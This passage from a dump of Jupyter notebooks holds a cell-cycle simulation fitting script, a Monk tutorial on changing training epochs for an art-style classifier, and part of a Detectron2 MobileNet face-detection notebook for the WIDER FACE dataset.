    'samples': 5,       # measurements per time point
    'nCells': 100,
    'mCells': 100,      # cell count used to normalise the data
    'GF': 0.95,         # growth fraction
    'G1': 0.46,
    'S': 0.33,
    'G2M': 0.21,
    'sCells' : 0.3,     # cell-level noise
    'sSamples' : 0.2    # sample-level noise
}
warnings.filterwarnings('ignore')
calc_error = False  # skip the slow MINOS interval search in the do_* workers
timep=np.linspace(0.01,1.5,5)
default_args['times'] = timep
#default_args['samples'] = int(np.round(120/(mm)))
index = pd.MultiIndex.from_product([[],[]],names=['std','index'])  # NOTE(review): appears unused below
# Priors for unknown model parameters
times = np.hstack([np.ones(default_args['samples'])*t for t in timep])  # one entry per individual sample
tmplist = []
Ns = 50  # replicas per model
with Pool(4) as p:
    tmplist=tmplist+p.map(do_old,np.arange(Ns))
    tmplist=tmplist+p.map(do_lognorm,np.arange(Ns))
    tmplist=tmplist+p.map(do_gamma,np.arange(Ns))
stat5 = pd.DataFrame(tmplist)
stat5.rename({"GF":"GFf"}, axis="columns",inplace=True)  # fitted growth fraction column becomes 'GFf'
stat5.index.rename('N',inplace=True)
# record the simulation noise levels and move them into the index
stat5['sSamples'] = 0.2
stat5['sCells'] = 0.3
stat5.set_index('sSamples', append=True, inplace=True)
stat5.set_index('sCells', append=True, inplace=True)
stat5.set_index('model', append=True, inplace=True)
stat5 = stat5.reorder_levels(['model','sSamples','sCells','N'])
warnings.filterwarnings('default')
stat5 = stat5.sort_index()
# store both the results and the parameters that generated them
with pd.HDFStore('data_tmp.pandas',complib='zlib',complevel=9) as st:
    st['minuit_full_new_s5_para'] = pd.Series(default_args)
    st['minuit_full_new_s5'] = stat5
```
## with 100 samples
```
# Scenario: 100 samples per time point, 100 cells (same workflow as the
# 5-sample case above).
default_args = {
    'samples': 100,     # measurements per time point
    'nCells': 100,
    'mCells': 100,      # cell count used to normalise the data
    'GF': 0.95,         # growth fraction
    'G1': 0.46,
    'S': 0.33,
    'G2M': 0.21,
    'sCells' : 0.3,     # cell-level noise
    'sSamples' : 0.2    # sample-level noise
}
warnings.filterwarnings('ignore')
calc_error = False  # skip the slow MINOS interval search in the do_* workers
timep=np.linspace(0.01,1.5,5)
#default_args['samples'] = int(np.round(120/(mm)))
default_args['times'] = timep
times = np.hstack([np.ones(default_args['samples'])*t for t in timep])  # one entry per individual sample
index = pd.MultiIndex.from_product([[],[]],names=['std','index'])  # NOTE(review): appears unused below
# Priors for unknown model parameters
tmplist = []
Ns = 50  # replicas per model
with Pool(4) as p:
    tmplist=tmplist+p.map(do_old,np.arange(Ns))
    tmplist=tmplist+p.map(do_lognorm,np.arange(Ns))
    tmplist=tmplist+p.map(do_gamma,np.arange(Ns))
stat100 = pd.DataFrame(tmplist)
stat100.rename({"GF":"GFf"}, axis="columns",inplace=True)  # fitted growth fraction column becomes 'GFf'
stat100.index.rename('N',inplace=True)
# record the simulation noise levels and move them into the index
stat100['sSamples'] = 0.2
stat100['sCells'] = 0.3
stat100.set_index('sSamples', append=True, inplace=True)
stat100.set_index('sCells', append=True, inplace=True)
stat100.set_index('model', append=True, inplace=True)
stat100 = stat100.reorder_levels(['model','sSamples','sCells','N'])
warnings.filterwarnings('default')
stat100 = stat100.sort_index()
# store both the results and the parameters that generated them
with pd.HDFStore('data_tmp.pandas',complib='zlib',complevel=9) as st:
    st['minuit_full_new_s100_para'] = pd.Series(default_args)
    st['minuit_full_new_s100'] = stat100
```
# 5 and 10000cells
```
# Scenario: 5 samples per time point but 1000 cells; fewer replicas (Ns=16)
# because each fit is more expensive.
default_args = {
    'samples': 5,       # measurements per time point
    'nCells': 1000,
    'mCells': 1000,     # cell count used to normalise the data
    'GF': 0.95,         # growth fraction
    'G1': 0.46,
    'S': 0.33,
    'G2M': 0.21,
    'sCells' : 0.3,     # cell-level noise
    'sSamples' : 0.2    # sample-level noise
}
warnings.filterwarnings('ignore')
calc_error = False  # skip the slow MINOS interval search in the do_* workers
timep=np.linspace(0.01,1.5,5)
#default_args['samples'] = int(np.round(120/(mm)))
default_args['times'] = timep
times = np.hstack([np.ones(default_args['samples'])*t for t in timep])  # one entry per individual sample
index = pd.MultiIndex.from_product([[],[]],names=['std','index'])  # NOTE(review): appears unused below
# Priors for unknown model parameters
tmplist = []
Ns = 16  # replicas per model
with Pool(4) as p:
    tmplist=tmplist+p.map(do_old,np.arange(Ns))
    tmplist=tmplist+p.map(do_lognorm,np.arange(Ns))
    tmplist=tmplist+p.map(do_gamma,np.arange(Ns))
stat1000 = pd.DataFrame(tmplist)
stat1000.rename({"GF":"GFf"}, axis="columns",inplace=True)  # fitted growth fraction column becomes 'GFf'
stat1000.index.rename('N',inplace=True)
# record the simulation noise levels and move them into the index
stat1000['sSamples'] = 0.2
stat1000['sCells'] = 0.3
stat1000.set_index('sSamples', append=True, inplace=True)
stat1000.set_index('sCells', append=True, inplace=True)
stat1000.set_index('model', append=True, inplace=True)
stat1000 = stat1000.reorder_levels(['model','sSamples','sCells','N'])
warnings.filterwarnings('default')
stat1000 = stat1000.sort_index()
# store both the results and the parameters that generated them
with pd.HDFStore('data_tmp.pandas',complib='zlib',complevel=9) as st:
    st['minuit_full_new_n1000_para'] = pd.Series(default_args)
    st['minuit_full_new_n1000'] = stat1000
```
## for different initial conditions
```
# Scan fit quality over different sampling windows: the start point and the
# length of the 5-point time grid are varied, with 10 replicas each and all
# three noise models fitted per replica.
default_args = {
    'samples': 100,
    'nCells': 100,
    'mCells': 100,
    'GF': 0.95,
    'G1': 0.46,
    'S': 0.33,
    'G2M': 0.21,
    'sCells' : 0.3,
    'sSamples' : 0.2
}
warnings.filterwarnings('ignore')
calc_error = False
allim = []
sss = 0       # running counter: makes every simulation seed unique
SM = 928639   # base seed offset
for start in np.linspace(0.01,0.2,19*1+1): #range(5,31,5):
    for leng in np.linspace(0.5,2,15*1+1):
        for n in range(10):
            timep=np.linspace(start,start+leng,5)
            times = np.hstack([np.ones(default_args['samples'])*t for t in timep])
            # --- model 1: Gaussian ("old"/Nowakowski) likelihood ---
            data = np.array(clasim.run(seed=sss+SM,mode=1,times=timep,**default_args))
            sss = sss+1
            lh = Nowakowski_LH(data*1.0/default_args['mCells'],times)
            mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,s=0.2,\
                            error_s=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,\
                            limit_Tc=(0,2), limit_r=(0,1),limit_GF=(0,1),limit_s=(0,1),\
                            errordef=0.5,print_level=0)
            mi_old.migrad(ncall=999999999);
            s = dict(mi_old.values)
            for ii in mi_old.errors:
                s.update({ii+"_error" : mi_old.errors[ii]})
            s.update({'N' : n})
            if calc_error:
                try:
                    tmp = mi_old.minos(sigma=2)
                    for i in tmp:
                        s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
                        s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
                except:
                    # NOTE(review): unlike the do_* helpers, s has no 'model'
                    # key in this loop, so this print would itself raise
                    # KeyError if ever reached (calc_error is False here).
                    print('error in errorfind',s['model'])
            s.update({'leng' : leng})
            s.update({'start' : start})
            nowak = s.copy()
            # --- model 2: gamma-noise likelihood ---
            data = np.array(clasim.run(seed=sss+SM,mode=1,times=timep,**default_args))
            sss = sss+1
            lh = clapy.asym_lhgamma(data=data,times=times,ncell=default_args['mCells'])
            mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,sigma_cell=0.3,sigma_sample=0.2,\
                            error_sigma_cell=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,error_sigma_sample=0.1,\
                            limit_Tc=(0.00001,2), limit_r=(0.00001,1),limit_GF=(0,1),limit_sigma_cell=(0.00001,1),limit_sigma_sample=(0.00001,1),\
                            errordef=0.5,print_level=0)
            mi_old.migrad();
            s = dict(mi_old.values)
            for ii in mi_old.errors:
                s.update({ii+"_error" : mi_old.errors[ii]})
            s.update({'N' : n})
            s.update({'leng' : leng})
            s.update({'start' : start})
            if calc_error:
                try:
                    tmp = mi_old.minos(sigma=2)
                    for i in tmp:
                        s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
                        s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
                except:
                    print('error in errorfind',s['model'])
            gamma = s.copy()
            # --- model 3: lognormal-noise likelihood ---
            data = np.array(clasim.run(seed=sss+SM,mode=1,times=timep,**default_args))
            sss = sss+1
            lh = clapy.asym_lh(data=data,times=times,ncell=default_args['mCells'])
            mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,sigma_cell=0.3,sigma_sample=0.2,\
                            error_sigma_cell=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,error_sigma_sample=0.1,\
                            limit_Tc=(0.00001,2), limit_r=(0.00001,1),limit_GF=(0,1),limit_sigma_cell=(0.00001,1),limit_sigma_sample=(0.00001,1),\
                            errordef=0.5,print_level=0)
            mi_old.migrad();
            s = dict(mi_old.values)
            for ii in mi_old.errors:
                s.update({ii+"_error" : mi_old.errors[ii]})
            s.update({'N' : n})
            s.update({'leng' : leng})
            s.update({'start' : start})
            if calc_error:
                try:
                    tmp = mi_old.minos(sigma=2)
                    for i in tmp:
                        s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
                        s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
                except:
                    print('error in errorfind',s['model'])
            print('finiscged')
            print(sss+SM,nowak,s)
            # one row per model, indexed by (start, leng, N)
            stat = pd.DataFrame([nowak,gamma,s],index=['old','gamma','lognorm'])
            stat.set_index('start', append=True, inplace=True)
            stat.set_index('leng', append=True, inplace=True)
            stat.set_index('N', append=True, inplace=True)
            allim.append( stat )
            #reorder_levels(['start','leng','model']) )
warnings.filterwarnings('default')
allimnew = pd.concat(allim).sort_index()
with pd.HDFStore('data.pandas',complib='zlib',complevel=9) as st:
    st['s100_n10'] = allimnew
```
| github_jupyter |
<a href="https://colab.research.google.com/github/Tessellate-Imaging/monk_v1/blob/master/study_roadmaps/1_getting_started_roadmap/5_update_hyperparams/3_training_params/1)%20Update%20number%20of%20epochs.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Goals
### Learn how to change the number of training epochs
# Table of Contents
## [Install](#0)
## [Train for 5 epochs](#1)
## [Train for 15 epochs](#2)
## [Compare both the experiments](#3)
<a id='0'></a>
# Install Monk
## Using pip (Recommended)
- colab (gpu)
- All backends: `pip install -U monk-colab`
- kaggle (gpu)
- All backends: `pip install -U monk-kaggle`
- cuda 10.2
- All backends: `pip install -U monk-cuda102`
- Gluon backend: `pip install -U monk-gluon-cuda102`
- Pytorch backend: `pip install -U monk-pytorch-cuda102`
- Keras backend: `pip install -U monk-keras-cuda102`
- cuda 10.1
- All backend: `pip install -U monk-cuda101`
- Gluon backend: `pip install -U monk-gluon-cuda101`
- Pytorch backend: `pip install -U monk-pytorch-cuda101`
- Keras backend: `pip install -U monk-keras-cuda101`
- cuda 10.0
- All backend: `pip install -U monk-cuda100`
- Gluon backend: `pip install -U monk-gluon-cuda100`
- Pytorch backend: `pip install -U monk-pytorch-cuda100`
- Keras backend: `pip install -U monk-keras-cuda100`
- cuda 9.2
- All backend: `pip install -U monk-cuda92`
- Gluon backend: `pip install -U monk-gluon-cuda92`
- Pytorch backend: `pip install -U monk-pytorch-cuda92`
- Keras backend: `pip install -U monk-keras-cuda92`
- cuda 9.0
- All backend: `pip install -U monk-cuda90`
- Gluon backend: `pip install -U monk-gluon-cuda90`
- Pytorch backend: `pip install -U monk-pytorch-cuda90`
- Keras backend: `pip install -U monk-keras-cuda90`
- cpu
- All backend: `pip install -U monk-cpu`
- Gluon backend: `pip install -U monk-gluon-cpu`
- Pytorch backend: `pip install -U monk-pytorch-cpu`
- Keras backend: `pip install -U monk-keras-cpu`
## Install Monk Manually (Not recommended)
### Step 1: Clone the library
- git clone https://github.com/Tessellate-Imaging/monk_v1.git
### Step 2: Install requirements
- Linux
- Cuda 9.0
- `cd monk_v1/installation/Linux && pip install -r requirements_cu90.txt`
- Cuda 9.2
- `cd monk_v1/installation/Linux && pip install -r requirements_cu92.txt`
- Cuda 10.0
- `cd monk_v1/installation/Linux && pip install -r requirements_cu100.txt`
- Cuda 10.1
- `cd monk_v1/installation/Linux && pip install -r requirements_cu101.txt`
- Cuda 10.2
- `cd monk_v1/installation/Linux && pip install -r requirements_cu102.txt`
- CPU (Non gpu system)
- `cd monk_v1/installation/Linux && pip install -r requirements_cpu.txt`
- Windows
- Cuda 9.0 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu90.txt`
- Cuda 9.2 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu92.txt`
- Cuda 10.0 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu100.txt`
- Cuda 10.1 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu101.txt`
- Cuda 10.2 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu102.txt`
- CPU (Non gpu system)
- `cd monk_v1/installation/Windows && pip install -r requirements_cpu.txt`
- Mac
- CPU (Non gpu system)
- `cd monk_v1/installation/Mac && pip install -r requirements_cpu.txt`
- Misc
- Colab (GPU)
- `cd monk_v1/installation/Misc && pip install -r requirements_colab.txt`
- Kaggle (GPU)
- `cd monk_v1/installation/Misc && pip install -r requirements_kaggle.txt`
### Step 3: Add to system path (Required for every terminal or kernel run)
- `import sys`
- `sys.path.append("monk_v1/");`
## Dataset - Art style type classification
- https://www.kaggle.com/thedownhill/art-images-drawings-painting-sculpture-engraving
```
# Fetch the art-style dataset from Google Drive (the inner wget/sed pipeline
# obtains the large-file confirmation token), then unpack it quietly.
! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1elVvUTgoX_E4QuLAUP-tUhMcYNhH117E' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1elVvUTgoX_E4QuLAUP-tUhMcYNhH117E" -O art_style_type.zip && rm -rf /tmp/cookies.txt
! unzip -qq art_style_type.zip
```
# Imports
```
#Using gluon backend
# When installed using pip
from monk.gluon_prototype import prototype
# When installed manually (Uncomment the following)
#import os
#import sys
#sys.path.append("monk_v1/");
#sys.path.append("monk_v1/monk/");
#from monk.gluon_prototype import prototype
```
<a id='1'></a>
# Train For 5 epochs
```
# Create a Monk gluon experiment and train with default settings for 5 epochs.
gtf = prototype(verbose=1);
gtf.Prototype("change-train-epochs", "epochs_5");
gtf.Default(dataset_path="art_style_type/train",
            model_name="resnet18_v1",
            freeze_base_network=False,  # fine-tune the whole network
            num_epochs=5);
#Read the summary generated once you run this cell.
#Start Training
gtf.Train();
#Read the training summary generated once you run the cell and training is completed
# Lets validate on training data itself
gtf = prototype(verbose=1);
gtf.Prototype("change-train-epochs", "epochs_5", eval_infer=True);  # reload experiment in inference mode
gtf.Dataset_Params(dataset_path="art_style_type/val");
gtf.Dataset();
accuracy, class_based_accuracy = gtf.Evaluate();
```
<a id='2'></a>
# Train for 15 epochs
```
# Second experiment: deliberately starts with the same num_epochs=5 default;
# the epoch count is raised to 15 afterwards via gtf.update_num_epochs(15).
gtf = prototype(verbose=1);
gtf.Prototype("change-train-epochs", "epochs_15");
gtf.Default(dataset_path="art_style_type/train",
            model_name="resnet18_v1",
            freeze_base_network=False,
            num_epochs=5);
#Read the summary generated once you run this cell.
#Read the summary generated once you run this cell.
```
## Update training epochs
```
# Raise the epoch count for the already-created experiment.
gtf.update_num_epochs(15);
# Very important to reload post updates
gtf.Reload();
#Start Training
gtf.Train();
#Read the training summary generated once you run the cell and training is completed
#Read the training summary generated once you run the cell and training is completed
```
## Validate the trained classifier on training data itself
```
# Reload the 15-epoch experiment in inference mode and evaluate it.
gtf = prototype(verbose=1);
gtf.Prototype("change-train-epochs", "epochs_15", eval_infer=True);
gtf.Dataset_Params(dataset_path="art_style_type/val");
gtf.Dataset();
accuracy, class_based_accuracy = gtf.Evaluate();
```
<a id='3'></a>
# Compare experiments
```
# Invoke the comparison class
from monk.compare_prototype import compare
# Create a project
gtf = compare(verbose=1);
gtf.Comparison("Statistics");
# Add experiment
gtf.Add_Experiment("change-train-epochs", "epochs_5");
gtf.Add_Experiment("change-train-epochs", "epochs_15");
# Generate stats
gtf.Generate_Statistics();
os.listdir("workspace/comparison/Statistics")
# We are interested in training times, validation accuracies and train-test plots
from IPython.display import Image
Image(filename="workspace/comparison/Statistics/stats_best_val_acc.png")
from IPython.display import Image
Image(filename="workspace/comparison/Statistics/stats_training_time.png")
```
## Longer training with more epochs
```
# Accuracy-over-epoch curves for both experiments.
from IPython.display import Image
Image(filename="workspace/comparison/Statistics/train_accuracy.png")
from IPython.display import Image
Image(filename="workspace/comparison/Statistics/val_accuracy.png")
```
# Goals Completed
### Learn how to change the number of training epochs
| github_jupyter |
<a href="https://colab.research.google.com/github/DarekGit/FACES_DNN/blob/master/notebooks/07_03_WIDERFACE_Detectron2_DD_mobilenet_v2_test%2BScript_V2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
###[Spis Treści](https://github.com/DarekGit/FACES_DNN/blob/master/notebooks/Praca_Dyplomowa.ipynb)
[7. Eksport modelu](07_00_Eksport_modelu.ipynb)
# Install detectron2
Detectron2 https://github.com/facebookresearch/detectron2 <br>
Detectron2 Beginner's Tutorial https://colab.research.google.com/drive/16jcaJoc6bCFAQ96jDe2HwtXj7BMD_-m5 <br>
Documentation https://detectron2.readthedocs.io <br>
Detectron2 Model Zoo and Baselines https://github.com/facebookresearch/detectron2/blob/master/MODEL_ZOO.md <br>
Rethinking ImageNet Pre-training https://arxiv.org/pdf/1811.08883.pdf <br>
Wykorzystano kody z <br>
https://github.com/youngwanLEE/vovnet-detectron2
```
import os
def Wider_load(val=True,train=True,test=False):
    """Download the requested WIDER FACE splits plus annotations and helper
    scripts into ./WIDER (Google Drive mirrors, unpacked in place).
    Uses IPython shell magics, so it only works inside a notebook."""
    os.makedirs('WIDER/', exist_ok=True)
    if val:
        #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDd3dIRmpvSk8tLUk
        !gdown https://drive.google.com/uc?id=1-5A_pa_jDS7gk8mHVCBB7ApV5KN8jWDr -O WIDER/tempv.zip
        !unzip -q WIDER/tempv.zip -d WIDER
        !rm WIDER/tempv.zip
    if train:
        ### WIDER Face Training Images
        #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDQUUwd21EckhUbWs
        !gdown https://drive.google.com/uc?id=1-1iJfmXKYvAx9uLdRDX5W6HHG_KZv1jH -O WIDER/temptr.zip
        !unzip -q WIDER/temptr.zip -d WIDER
        !rm WIDER/temptr.zip
    if test:
        #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDbW4tdGpaYjgzZkU
        !gdown https://drive.google.com/uc?id=1tTpUJZEQMKDVxKT6100V5FwDuGX_8sDi -O WIDER/tempt.zip
        !unzip -q WIDER/tempt.zip -d WIDER
        !rm WIDER/tempt.zip
    ### Face annotations
    !wget mmlab.ie.cuhk.edu.hk/projects/WIDERFace/support/bbx_annotation/wider_face_split.zip -O WIDER/tempa.zip
    !unzip -q WIDER/tempa.zip -d WIDER
    !rm WIDER/tempa.zip
    #annotations tool
    !gdown https://drive.google.com/uc?id=1_9ydMZlTNFXBOMl16xsU8FSBmK2PW4lN -O WIDER/tools.py
    #bundle with the training-results data
    !gdown https://drive.google.com/uc?id=1Sk6JWWZFHfxvAJtF7JKOk9ptfyVZWNoU -O WIDER/WIDER_test_set.json
    #mAP tools
    !wget -q -O WIDER/mAP.py https://drive.google.com/uc?id=1PtEsobTFah3eiCDbSsYblOGbe2fmkjGR
    ### Examples and formats of the submissions
    #!wget mmlab.ie.cuhk.edu.hk/projects/WIDERFace/support/example/Submission_example.zip
def repo_load():
    """Install detectron2 from source plus pycocotools, and fetch the
    mobilenet backbone code bundle. Notebook-only (uses shell magics)."""
    !pip install cython pyyaml==5.1
    !pip install -U 'git+https://github.com/cocodataset/cocoapi.git#subdirectory=PythonAPI'
    # install detectron2:
    !git clone https://github.com/facebookresearch/detectron2 detectron2_repo
    !pip install -q -e detectron2_repo
    # mobilenet backbone sources for detectron2
    !gdown https://drive.google.com/uc?id=1U0SVkSaSio4TBiXvF1QfTZI65WYpXpZ9
    !unzip -qo mobilenet.zip
    !rm -f mobilenet.zip
# Install detectron2 and download the WIDER data (validation split only).
repo_load()
Wider_load(train=False) #Wider_load(train=False) #
#Faces_DD set: evaluation images plus their ground-truth metrics file
!pip install gdown
import gdown
url = 'https://drive.google.com/uc?export=download&id=1XwVm-2EMFdy9Zq39pKFr5UoSJvgTOm-7'
output = 'Faces_DD.zip'
gdown.download(url, output, False)
!unzip -qo Faces_DD.zip
!rm Faces_DD.zip
url = 'https://drive.google.com/uc?export=download&id=1gIIUK518Ft9zi3VDVQZLRVozI-Hkpgt2'
output = 'Faces_DD/Faces_DD_metrics.json'
gdown.download(url, output, False)
```
<font color=red> Restart runtime to continue... <b>Crtl+M.</b> </font>
```
# Show the GPU assigned to this runtime and the available RAM.
!nvidia-smi
from psutil import virtual_memory
print('Your runtime has {:.1f} gigabytes of available RAM\n'.format(virtual_memory().total / 1e9))
#!gdown https://drive.google.com/uc?id=1Sk6JWWZFHfxvAJtF7JKOk9ptfyVZWNoU -O WIDER/WIDER_test_set.json
import time
import torch, torchvision
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()
from google.colab import drive
import os
import cv2
import random
import itertools
import shutil
import glob
import json
import numpy as np
import pandas as pd
from PIL import ImageDraw, Image
from collections import defaultdict
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
from matplotlib import collections as mc
from google.colab.patches import cv2_imshow
from detectron2 import model_zoo
import detectron2.utils.comm as comm
from detectron2.engine import DefaultPredictor, DefaultTrainer, HookBase
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import DatasetCatalog, MetadataCatalog, build_detection_train_loader
from detectron2.structures import BoxMode
from detectron2.data import build_detection_test_loader
from detectron2.data.datasets import register_coco_instances
from detectron2.evaluation import COCOEvaluator, inference_on_dataset
from mobilenet.utils import add_mobilenet_config, build_mobilenetv2_fpn_backbone
from WIDER.mAP import mAP, plot_mAP
from WIDER.tools import annotations,output_Files
#paths to the trained mobilenet model weights
with open('WIDER/WIDER_test_set.json','r') as f:
    test_set=json.load(f)
output_files=output_Files()
with open('Faces_DD/Faces_DD_metrics.json','r') as f:
    Faces_DD=json.load(f)
resF,resW ={},{} # results for Faces and Wider: {gbxs,dbxs,metric}
test_set['BN_Mish_V2_250+F_2_100k'] #best model BN+Mish V2 250k iterations + FrozenBN 100k iterations
len(test_set.keys()),test_set.keys()
```
800k - trenowanie na parametrach domyslnych do 800k iteracji
BN_800k - z BatchNormalization do 800k
BN_V2_300k - BN + normalizacja w preprocesing + poprawiony format na RGB
BN_Mish - zmieniona funkcja aktywacji na Mish z ReLU6
BN_Mish + F - douczania ze zmienionym BN na FrozenBN
# Prepare the dataset
## WIDER FACE: A Face Detection Benchmark
http://shuoyang1213.me/WIDERFACE/ <br>
https://arxiv.org/pdf/1511.06523.pdf <br>
```
from detectron2.data.datasets.coco import convert_to_coco_json
# Build annotation dicts for each available split and register them with
# detectron2's DatasetCatalog as face_train / face_val / face_test.
annos={}
train = annotations("train")
if len(train)>0: annos['train']=train
val = annotations('val')
if len(val)>0: annos['val']=val
test = annotations('test') #random.samples(annotations('test'),5000)
if len(test)>0: annos['test']=test
for d in annos.keys():
    # d=d binds the loop variable at definition time (avoids the
    # late-binding-closure trap)
    DatasetCatalog.register("face_" + d, lambda d=d: annos[d])
    MetadataCatalog.get("face_" + d).set(thing_classes = ['face'])
'''
faces_metadata = MetadataCatalog.get("face_train")
convert_to_coco_json('face_train', "./OUTPUT/face_train_coco_format.json")
'''
```
# "Base-RCNN-MobileNet-FPN_v1.yaml"
mobilenet/configs
Użycie modelu
```
# full set of codes and results:
# https://drive.google.com/drive/folders/1ApEnn3br2Z2Nt3-0Ve9DKYKMiDkFVpAR?usp=sharing
#cfg configuration bundles, one Google Drive file per training variant
cfg_set = {
    'FrozenBN':'https://drive.google.com/uc?id=1rZFzJaR_g7uYuTguTdbUuCQYD4eXLeqw',
    'BN': 'https://drive.google.com/uc?id=1-doXtwe5iZHoqPzKGc2ZZbxj6Ebhxsn4',
    'BN_V2':'https://drive.google.com/uc?id=1wywB8UAaOO5KZx3IS35kV-rLsvJMIse6',
    'BN_Mish':'https://drive.google.com/uc?id=1-axV3KKg8-YiZZ7uDBh_2v181JoC9Nj3',
    'BN_Mish_V2':'https://drive.google.com/uc?id=1WoESx5RYvpapNicpSrmMoNJeE2GVm3zK',
    'BN_Mish_V3':'https://drive.google.com/uc?id=1-Kgd_2AS4EsD_ZPqP7SxkscyDjP-Qhnr',
    'BN_Mish_V2F':'https://drive.google.com/uc?id=1pCwyYCjIoduro2vIKMZi5HhlpaypH0_x',
}
def test_set_add(config,count,pth,ext=''): #config name or index of cf_set.keys(), count @ .000
    """Register a trained-weights entry in the global test_set dict.

    config -- a key of cfg_set, or an integer index into its keys
    count  -- iteration count in thousands; the weights file is
              model_{count*1000-1:07}.pth
    pth    -- Google Drive file id of the weights
    ext    -- optional suffix distinguishing fine-tuning runs
    Returns (entry_name, entry_dict) for the added configuration.
    """
    set_list=list(cfg_set.keys())
    if (isinstance(config,str) and not config in set_list) or (isinstance(config,int)) and config >=len(set_list):
        # NOTE(review): on this invalid-config path set_choice is never bound,
        # so the return below raises UnboundLocalError after the message.
        print('No ',config,' on the list: ', cfg_set.keys())
    else:
        config=list(cfg_set.keys())[config] if isinstance(config,int) else config
        set_choice=config+ext+'_'+str(count)+'k'
        weights='model_{:07}.pth'.format((count*1000)-1)
        test_set[set_choice]={'pth':'https://drive.google.com/uc?id='+pth,
                              'weights_name': weights,
                              'config': config,}
    return set_choice,test_set[set_choice]
#Weights and cfg configuration from training
cfg = get_cfg()
add_mobilenet_config(cfg)  # extend the default config with mobilenet-specific keys
def cfg_write(cfg, cfg_all):
    """Recursively copy every leaf value from *cfg_all* into *cfg*.

    Nested dicts in cfg_all are descended into; the corresponding sub-node of
    cfg is updated in place. Returns the (mutated) cfg for convenience.
    """
    for key, value in cfg_all.items():
        if isinstance(value, dict):
            cfg_write(cfg[key], value)
        else:
            cfg[key] = value
    return cfg
def set_predictor(set_choice,device='cuda'):
    """Download the weights and saved config for test_set[set_choice], rebuild
    the detectron2 configuration and return (DefaultPredictor, cfg, set_choice).
    Notebook-only (uses gdown shell magics)."""
    print('PREPARATION: ',set_choice)
    path = test_set[set_choice]['pth'] #path to the model weights
    out = test_set[set_choice]['weights_name']
    !gdown $path #-O $out #without -O we keep a consistency check on the file name
    path=cfg_set[test_set[set_choice]['config']] #path to the configuration
    !gdown -q $path -O 'Base-RCNN-MobileNet-FPN_V1_ALL.json'
    with open('Base-RCNN-MobileNet-FPN_V1_ALL.json','r') as f:
        cfg_all=json.load(f)
    cfg = get_cfg(); add_mobilenet_config(cfg)
    cfg=cfg_write(cfg,cfg_all)  # replay the training-time configuration values
    cfg.MODEL.WEIGHTS = test_set[set_choice]['weights_name']
    cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5 # set the testing threshold for this model
    cfg.MODEL.DEVICE=device
    return DefaultPredictor(cfg),cfg,set_choice
```
AP metric on val
```
def plot_marks(img,metric,dbxs=[],figsize=(14,14)):
    """Show an image with its annotated ground-truth boxes (white) and,
    optionally, detection boxes (red).

    metric -- dict with 'marks' ([l,t,r,b] boxes), 'persons' and 'path'
    dbxs   -- detections as [l,t,r,b,confidence]; [] draws only ground truth
    (dbxs=[] is a mutable default, but it is only read, never mutated.)
    """
    fig, ax = plt.subplots(1,1,figsize=figsize); ax.imshow(img)
    Ms=np.array(metric['marks'])
    color,color_det,lw=('white','red',1)
    for k,dbx in enumerate(metric['marks']):
        # label each gt box with index + person name, black shadow under white text
        annot=str(k)+' - '+metric['persons'][k]
        ax.annotate(annot,np.array(dbx[:2])+2,color='k')
        ax.annotate(annot,dbx[:2],color='w')
    if dbxs != []:
        # detection rectangles (confidence value ignored for drawing)
        cbox = mc.LineCollection([[[l,t],[r,t],[r,b],[l,b],[l,t]] for l,t,r,b,_ in dbxs], linewidth=lw+1, colors=color_det)
        ax.add_collection(cbox)
    # ground-truth rectangles
    cbox = mc.LineCollection([[[l,t],[r,t],[r,b],[l,b],[l,t]] for l,t,r,b in Ms], linewidth=lw, colors=color)
    ax.add_collection(cbox)
    print(len(metric['marks']),end=', ')
    print('Annotated Boxes',end=', ')
    print(' '+metric['path'])
    for name in metric['persons']:
        if name !='': print(name,end=', ')
    #plt.axis('off')
    plt.show()
def results(d_set,predictor,name='mAP_',ext='---',pres=False):
    """Run *predictor* over a data set, collect ground-truth and detected
    boxes, plot the mAP curves and optionally show a fixed list of examples.

    d_set can be detectron2-style dicts (with 'annotations') or the Faces_DD
    metric format. Returns {'gbxs': ..., 'dbxs': ..., 'metric': ...}.
    """
    start=time.time()
    gbxs=[]; dbxs=[]; dset=d_set
    if 'annotations' in d_set[0].keys(): #convert Wider metric to Faces format, selected fields only
        dset=[]
        for r in d_set:
            dset.append({'path' : r['file_name'],'marks' : [b['bbox'] for b in r['annotations']],
                         'persons': ['' for b in r['annotations']]})
    Len=len(dset); print(ext,' ',Len,' imgs : 0 +',end='')
    for i,d in enumerate(dset): #collect detected and ground-truth boxes
        im = cv2.imread(d["path"])
        outputs = predictor(im)
